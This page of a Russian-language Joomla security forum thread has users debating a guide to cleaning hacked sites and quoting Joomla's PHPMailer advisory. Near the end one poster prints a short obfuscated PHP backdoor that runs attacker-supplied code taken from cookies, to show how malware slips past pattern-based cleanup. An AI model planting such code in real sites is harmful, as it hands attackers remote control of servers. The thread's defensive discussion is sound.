Вирус на сайте, редирект, что делать как лечить! - страница 26 - Безопасность сайтов на Joomla

Денег сколько?
Например закину архив со всеми php-файлами поизучать.

Смотря что вы хотите получить в итоге. Пишите задание в коммерческий раздел. Кому будет интересно, назовут свою стоимость работ.

Была проблема с несколькими сайтами Joomla. Заразились в январе где то. Долго бился и искал остатки шелов, аплоадеров в папках ссайта. Много искал в интернете инструкций как почистить сайт, но после выполнения всех инструкций оставлаись всё такие ещё какие то лвые файлы. И вот хочу посоветовать инструкцию по моему мнению самую подходящую и понятную для чистки сайтов.

...знакомый айтишник дал мне просто эту ссылку и сказал как избавится от моей проблемы. Говорит типа "зае..и вы меня" и написал инструкцию.

А зачем здесь вообще на форуме этот раздел с этими темами?) Оставьте один коммерческий раздел и пусть люди туда пишут.
И так полагаю, здесь как раз раздел и тема для того, чтобы давать советы. Я кстати сам намучался уже за январь февраль с этими заражениями, так как у меня не один сайт, и не один хостинг, а на Joomle около 30 сайтов, раскиданных по разным хостингам. И учитывая массовость и однотипность заражения за этот период времени, данные советы будут самыми актуальными и действенными.

, а именно со следующим содержимым:

Вредоносный код часто использует функции PHP: eval, base64, COOKIES

Лечение сайтов - это медицина и не надо пытаться лечить чуму в домашних условиях.

Я бы добавил, что не надо давать советов из разряда средств народной медицины. Они не только малоэффективны, но и могут сильно навредить.

Вы можете вообще привести один пример как можно навредить сайту используя эту инструкцию? Например, приведите полезную строку в начале файла (из дистрибутива, компонентов, шаблонов Joomla), которую можно удалить использую данную инструкцию?

$this->data = & $_COOKIE;

$redirect = base64_decode($returnUri);

я из 30 сайтов ниодному не навредил

А причем тут начало файла? хорошая вредонска сидит в серединке или вовсе подменяет весь файл. Ну а так если следовать заветам сего мастера.

Код

$this->data = & $_COOKIE;

И куки в компонентах работать не будут.

Код

$redirect = base64_decode($returnUri);

И прощай возвраты при сохранении.

maximm, ваше желание помочь и поделиться своим опытом, конечно, очень похвально. Вам хотят объяснить, что вы пока только устраняете симптомы, а не саму болезнь: эти зловредные коды каким-то образом попадают на ваш сайт, верно? Вы их сегодня удаляете, завтра они опять появятся. А антивирусные расширения всегда опаздывают на шаг, если не на 2, за самими вирусами: чтобы обезвредить вирус, он (вирус) должен сначала проявить себя. Ведь те парни, которые пишут вирусы, не сообщают, какие вирусы они планируют выпускать.

Ни одного названия переменной из непонятных случайных символов (на чём кстати акцентировано внимание красным цветом в инструкции) в вашем примере я не вижу)

Я понимаю конечно вашу коммерческую заинтересованность  в этом вопросе, но есть люди которые не ленятся, у которых есть время и они хотят самостоятельно разобраться с этой проблемой.

Поэтому я считаю, что для таких людей данные разделы форумы и существуют и надо давать более конструктивные ответы, нежели чем перенаправлять в коммерческий раздел. Коммерческий разделы как раз для тех, кто очень ленивый или у которого много других забот, поэтому им то следует как раз пользоваться платными услугами.

Вот не в обиду честно. Просто ответьте на вопрос, который вам уже задави ни раз. Следуя этой инструкции как предотвратить попадание "однотипного  вредоносного кода марта 2017" к себе на сайт.

P.S кстати с точки зрения коммерции, пытаться это каждый раз кому разжевывать не выгодно, проще давать ссылку на такие инструкции, а потом зарабатывать на этих людях.

И так же не забывайте, Robert, про вашу подпись: Не будь паразитом, сделай что-нибудь самостоятельно!

В этой инструкции не указано как предотвратить заражения, там просто указано как лечить сайт (так как она принципе универсальная, как для Joomla, Wordpress, так и для обычных сайтов созданным на HTML + PHP и которые так же подверглись заражению через не изолированные сайты на хостинге)

Информации о том как предотвратить заражение в принципе и здесь полно. Да и предотварщение заражения зависит от конкретной CMS

Кстати насчёт сравнения с медициной. Если немного поюморить, то можно сказать, что в отличии от медицины в лечении сайтов всегда есть одно неоспоримое преимущество - это "резервная копия")

...Так вот, чем больше он узнал, тем больше он чувствовал себя никчемным...

Собственная безопасность для Joomla? Можно что то улучшить в плане защиты, но коренным образом менять что то сложно.

Во первых, она со всеми сайтами работает, независимо от движка. А во вторых, она не является частью какого либо сайта и работает отдельно от него. Вы даже файлов этой системы не увидите, только ее инфостраницу, передав в GET специальный запрос. Я сейчас не готов обсуждать эту работу.

Собственная безопасность для Joomla? Можно что то улучшить в плане защиты, но коренным образом менять что то сложно.

Коренным образом конечно сложно, особенно от таких критических уязвимостей как в PHPmailer

Хоть бы почитали перед тем как что-то писать.
Уязвимость в phpmailer не затронула Joomla!!

Description

All versions of the third-party PHPMailer library distributed with Joomla! versions up to 3.6.5 are vulnerable to a remote code execution vulnerability. This is patched in PHPMailer 5.2.20 which will be included with Joomla! 3.7. After analysis, the JSST has determined that through correct use of the JMail class, there are additional validations in place which make executing this vulnerability impractical within the Joomla environment. As well, the vulnerability requires being able to pass user input to a message's "from" address; all places in the core Joomla API which send mail use the sender address set in the global configuration and does not allow for user input to be set elsewhere. However, extensions which bundle a separate version of PHPMailer or do not use the Joomla API to send email may be vulnerable to this issue.

Generally, the Joomla project does not issue advisories regarding third party libraries, however given the severity of this issue we felt it important to advise our users that we are aware of this issue and we have determined that the additional validations in our API prevent triggering this vulnerability.

Affected Installs

Joomla! CMS versions 1.5.0 through 3.6.5

Solution

No action required for Joomla users, the updated library will be included in the next scheduled release and additional mechanisms exist in Joomla core to prevent triggering the vulnerability. Users of the PHPMailer library separate from Joomla are advised to upgrade to 5.2.20 or newer ASAP.

Вчера было объявлено о том, что в библиотеке PHPMailer обнаружена критическая уязвимость CVE-2016-1003, которая позволяет удаленно выполнить код в контексте web-сервера и скомпрометировать web-приложение.

Joomla! Security центр сообщает, что это не повлияет на Joomla! CMS, так как стандартные расширения используют класс JMail, который имеет необходимую валидацию, поэтому эксплуатация уязвимости в принципе невозможна. Если сторонние расширения напрямую используют Mailer класс, то эксплуатация уязвимости возможна только в том случае, если форма позволяет пользователю указать адрес "from".

Ну так читайте до концаЕсли тяжко с аннглийским, то https://cmscafe.ru/novosti/858-kriticheskaya-uyazvimost-v-phpmailer-ne-povliyaet-na-joomla-cms

Коренным образом конечно сложно, особенно от таких критических уязвимостей как в PHPmailer

Ну так там написано, что уязвимость устраняется после обновления Joomla, а Joomla как Wordpress автоматически не обновляется. Поэтому, кто не успел обновить, тот могу подвергнуться заражению.

maximm завязывайте.

Код

<?php

$uzg=$_COOKIE;
$bwfbc=$uzg[ovpa];
if($bwfbc){
	$bxgc=$bwfbc($uzg[txas]);$dyt=$bwfbc($uzg[vvkn]);$nvdiy=$bxgc("",$dyt);$nvdiy();
}

Я также не отношусь к спецам по обезвреживанию вирусов, но думаю, что мог бы написать какую-нибудь плохую вещь со всеми eval, base64..., которую ваши айболиты не сразу могут вычислить.